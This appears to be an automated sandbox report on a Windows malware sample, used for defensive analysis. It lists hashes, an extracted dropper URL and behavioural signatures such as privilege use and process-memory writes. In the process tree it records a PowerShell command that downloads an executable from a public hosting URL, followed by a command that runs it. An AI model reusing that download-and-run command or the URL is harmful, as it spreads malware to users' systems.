Analysis
  max time kernel: 80s
  max time network: 19s
  platform: windows7_x64
  resource: win7-20241010-en
  resource tags: arch:x64, arch:x86, image:win7-20241010-en, locale:en-us, os:windows7-x64, system
  submitted: 20-11-2024 21:14
Behavioral task: behavioral1
  Sample: 17b2aa16bbf19ea943006c22aa00a07d20285d964fa9f0a27152fb563f43e2d3N.exe
  Resource: win7-20241010-en
  7 signatures, 120 seconds
General
  Target: 17b2aa16bbf19ea943006c22aa00a07d20285d964fa9f0a27152fb563f43e2d3N.exe
  Size: 89KB
  MD5: 8ab6d02d09997d5a1db2420aa60bb0e0
  SHA1: 67d2e628591e369c658cc2a65aa88b1fb8eb5863
  SHA256: 17b2aa16bbf19ea943006c22aa00a07d20285d964fa9f0a27152fb563f43e2d3
  SHA512: 8ed4116295add2915c4957f4c5af54d6a7f02d3b961278e63dd7fe730d6f41686550b3b2156cdce2df2e848358b8ece38157ace9762162a071aed3a7670d7447
  SSDEEP: 1536:zMFWeATa+8j6IuQ1crSgUZdnXAvU/XPNwsWh/5tDdWcFfjEQM3U0LRMaE:I7Z+LIB/n4U/fid9jpNfjEB37MaE
Malware Config
  Extracted
    Language: ps1
    Deobfuscated
    URLs
      exe.dropper: https://raw.githack.com/i87924hgasdhg/hgytiryty/master/busybox
Signatures

Blocklisted process makes network request (3 IoCs)
  flow  pid   Process
  5     1636  powershell.exe
  7     1636  powershell.exe
  8     1636  powershell.exe

(signature heading missing from source)
  pid   Process
  1636  powershell.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 3 IoCs)
  flow  ioc
  6     raw.githubusercontent.com
  7     raw.githubusercontent.com
  8     raw.githubusercontent.com

(signature heading missing from source)
  resource                                                                      yara_rule
  behavioral1/memory/1976-0-0x0000000000400000-0x000000000040E000-memory.dmp    upx
  behavioral1/memory/1976-15-0x0000000000400000-0x000000000040E000-memory.dmp   upx

Suspicious behavior: EnumeratesProcesses (1 IoCs)
  pid   Process
  1636  powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoCs)
  description              pid   Process
  Token: SeDebugPrivilege  1636  powershell.exe

Suspicious use of WriteProcessMemory (9 IoCs)
  description (pid, Process, procid_target):
  PID 1976 wrote to memory of 2012 (1976, 17b2aa16bbf19ea943006c22aa00a07d20285d964fa9f0a27152fb563f43e2d3N.exe, 31)
  PID 1976 wrote to memory of 2012 (1976, 17b2aa16bbf19ea943006c22aa00a07d20285d964fa9f0a27152fb563f43e2d3N.exe, 31)
  PID 1976 wrote to memory of 2012 (1976, 17b2aa16bbf19ea943006c22aa00a07d20285d964fa9f0a27152fb563f43e2d3N.exe, 31)
  PID 2012 wrote to memory of 1636 (2012, cmd.exe, 32)
  PID 2012 wrote to memory of 1636 (2012, cmd.exe, 32)
  PID 2012 wrote to memory of 1636 (2012, cmd.exe, 32)
  PID 1976 wrote to memory of 2720 (1976, 17b2aa16bbf19ea943006c22aa00a07d20285d964fa9f0a27152fb563f43e2d3N.exe, 33)
  PID 1976 wrote to memory of 2720 (1976, 17b2aa16bbf19ea943006c22aa00a07d20285d964fa9f0a27152fb563f43e2d3N.exe, 33)
  PID 1976 wrote to memory of 2720 (1976, 17b2aa16bbf19ea943006c22aa00a07d20285d964fa9f0a27152fb563f43e2d3N.exe, 33)
Processes

C:\Users\Admin\AppData\Local\Temp\17b2aa16bbf19ea943006c22aa00a07d20285d964fa9f0a27152fb563f43e2d3N.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\17b2aa16bbf19ea943006c22aa00a07d20285d964fa9f0a27152fb563f43e2d3N.exe"
  PID: 1976
  - Suspicious use of WriteProcessMemory

  C:\Windows\system32\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy unrestricted -Command (new-object System.Net.WebClient).Downloadfile('https://raw.githack.com/i87924hgasdhg/hgytiryty/master/busybox', 'that3.exe')
    PID: 2012
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -NoProfile -ExecutionPolicy unrestricted -Command (new-object System.Net.WebClient).Downloadfile('https://raw.githack.com/i87924hgasdhg/hgytiryty/master/busybox', 'that3.exe')
      PID: 1636
      - Blocklisted process makes network request
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

  C:\Windows\system32\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c that3.exe
    PID: 2720